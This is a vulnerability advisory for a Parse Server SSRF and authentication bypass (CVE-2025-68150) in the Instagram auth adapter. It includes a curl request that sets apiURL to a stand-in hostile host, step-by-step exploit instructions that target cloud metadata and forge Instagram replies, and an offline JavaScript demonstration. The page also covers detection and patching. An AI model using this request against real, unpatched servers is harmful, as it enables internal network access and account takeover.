Parse Server, Server-Side Request Forgery (SSRF), CVE-2025-68150 (High)


The vulnerability is in the Instagram authentication adapter of Parse Server. When a client signs up or logs in with Instagram `authData`, the adapter verifies the supplied `access_token` by calling the Instagram Graph API; before the fix it built that verification request from a client-controlled `apiURL` field inside the `authData` object instead of a fixed endpoint. An attacker could therefore choose where the server sent its token verification request. Pointing `apiURL` at an internal address yields Server-Side Request Forgery (SSRF), forcing the vulnerable server to make HTTP requests to internal or external systems it can reach. Pointing it at a host the attacker controls lets that host answer with a crafted response that mimics a valid Instagram API reply (a JSON body whose `id` matches the `id` claimed in `authData`), so Parse Server accepts the unverified token and authenticates the attacker as that user. The root cause was the absence of any validation or restriction on the destination of the outgoing authentication request.

DailyCVE form:

Platform: Parse Server
Version: < 8.6.2
Vulnerability: Server-Side Request Forgery
Severity: High
Date: 2025-12-16

Prediction: 2025-12-16

What Undercode Says:

Check the installed Parse Server version (vulnerable if below 8.6.2, or a 9.x pre-release below 9.1.1-alpha.1):
npm list parse-server

Test for the vulnerability (conceptual; replace APP_ID, USER_ID and ACCESS_TOKEN, and point apiURL at a host you control and can observe):
curl -X POST 'https://target.parse-server.com/parse/users' \
-H "X-Parse-Application-Id: APP_ID" \
-H "Content-Type: application/json" \
-d '{
"authData": {
"instagram": {
"id": "USER_ID",
"access_token": "ACCESS_TOKEN",
"apiURL": "http://malicious.internal/"
}
}
}'

An inbound request arriving at the observation host proves the server followed the client-supplied apiURL; a patched server contacts graph.instagram.com instead and the observation host sees nothing.

How to Exploit:

  1. The attacker constructs an Instagram sign-up request to Parse Server (POST to `/parse/users` with an `authData.instagram` object); only the application ID, which ships inside client apps, is needed.
  2. Inside that object the attacker sets `apiURL` to a destination of their choosing, for example the cloud metadata service (`http://169.254.169.254/`) or a host they control.
  3. Parse Server sends the token verification request to the attacker-specified URL instead of the Instagram Graph API.
  4. For SSRF: the server connects to internal resources the attacker cannot reach directly. Parse Server does not return the fetched body to the client, so the attacker observes only the outcome, error and timing of the request (blind SSRF) unless the chosen endpoint happens to return a body that satisfies the adapter's check.
  5. For auth bypass: the attacker's server answers with a JSON body whose `id` equals the `id` supplied in `authData`, which is all the adapter compares, so Parse Server treats the token as valid and grants a session for that user.
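The adapter logic behind the description above and the five exploit steps, as an added example that is not Parse Server's own code: a compact reconstruction of the Instagram token check in its vulnerable form (destination taken from `authData.apiURL`) beside the hardened form (fixed Graph API URL), driven by a constructed in-memory HTTP client so it runs offline. The attacker host `attacker.example`, the user id `4242`, the forged token and every canned response are assumptions invented for the illustration; the check itself (fetch `me?fields=id` with the token, compare the returned `id` with `authData.id`) follows the pattern the text describes.

```javascript
// Added example: illustrative reconstruction of the Instagram adapter's token
// check, NOT Parse Server's source. The HTTP client is a constructed in-memory
// stand-in; hosts, ids, tokens and responses below are invented for the demo.

const INSTAGRAM_API = 'https://graph.instagram.com/';

// Builds a fake HTTP GET: responses are looked up by URL prefix, and every URL
// the "server" is made to contact is appended to `log`, which is how the demo
// shows where the verification request actually went.
function makeHttpGet(responsesByPrefix, log) {
  return function httpGet(url) {
    log.push(url);
    const prefix = Object.keys(responsesByPrefix).find(p => url.startsWith(p));
    if (prefix === undefined) throw new Error('connection refused: ' + url);
    return responsesByPrefix[prefix]; // already-parsed JSON body
  };
}

function verifyUrl(base, authData) {
  return base + 'me?fields=id&access_token=' + encodeURIComponent(authData.access_token);
}

// Vulnerable pattern: the destination comes from the client's authData.
function validateVulnerable(authData, httpGet) {
  const apiURL = authData.apiURL || INSTAGRAM_API;
  const user = httpGet(verifyUrl(apiURL, authData));
  return Boolean(user) && String(user.id) === String(authData.id);
}

// Hardened pattern: the destination is fixed; authData.apiURL is ignored.
function validateHardened(authData, httpGet) {
  const user = httpGet(verifyUrl(INSTAGRAM_API, authData));
  return Boolean(user) && String(user.id) === String(authData.id);
}

// Runs one authData object through both versions and reports, for each,
// whether the token was accepted and which URLs the server contacted.
function runScenario(authData, responsesByPrefix) {
  const result = {};
  const variants = [['vulnerable', validateVulnerable], ['hardened', validateHardened]];
  for (const [name, validate] of variants) {
    const log = [];
    let accepted = false;
    try {
      accepted = validate(authData, makeHttpGet(responsesByPrefix, log));
    } catch (e) {
      accepted = false; // unreachable destination: auth fails, but the request was still attempted
    }
    result[name] = { accepted, contacted: log };
  }
  return result;
}

// Constructed "network": the attacker's host echoes the id the attacker
// claimed; the (stubbed) real Graph API rejects the forged token; the metadata
// service answers with a body that carries no matching id.
const FAKE_NETWORK = {
  'http://attacker.example/': { id: '4242' },
  [INSTAGRAM_API]: { error: { message: 'Invalid OAuth access token.' } },
  'http://169.254.169.254/': { body: 'ami-id\ninstance-id\n...' },
};

// Auth bypass: apiURL points at the attacker's host, which fakes a valid reply.
function authBypassScenario() {
  return runScenario(
    { id: '4242', access_token: 'forged-token', apiURL: 'http://attacker.example/' },
    FAKE_NETWORK,
  );
}

// Blind SSRF: apiURL points at the cloud metadata service; auth still fails,
// but the vulnerable server has been made to connect to an internal address.
function metadataSsrfScenario() {
  return runScenario(
    { id: '4242', access_token: 'forged-token', apiURL: 'http://169.254.169.254/' },
    FAKE_NETWORK,
  );
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(authBypassScenario(), null, 2));
  console.log(JSON.stringify(metadataSsrfScenario(), null, 2));
}
```

Running it shows the vulnerable variant contacting `http://attacker.example/me?...` and accepting the forged `id`, while the hardened variant contacts only `https://graph.instagram.com/` and rejects the token; in the metadata scenario neither variant authenticates, but only the vulnerable one ever connects to `169.254.169.254`, which is exactly the blind SSRF the advisory describes.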

Protection from this CVE

– Update to Parse Server 8.6.2 or later (on the 9.x pre-release line, 9.1.1-alpha.1 or later).
– The patch fixes the verification endpoint to `https://graph.instagram.com` and ignores any client-supplied `apiURL` value.
– No workaround exists within Parse Server itself; upgrading is essential. Until the upgrade is deployed, an egress allow-list on the Parse Server host that permits outbound HTTPS only to the Instagram Graph API is a general compensating control: it stops the verification request from reaching internal addresses or an attacker-controlled host, which also defeats the authentication bypass.

Impact

  • SSRF Attacks: Unauthorized access to internal networked services and sensitive data.
  • Authentication Bypass: Potential for unauthorized application login.
  • Remote Exploitation: Attack is network-exploitable without user interaction.


Sources:

Reported By: github.com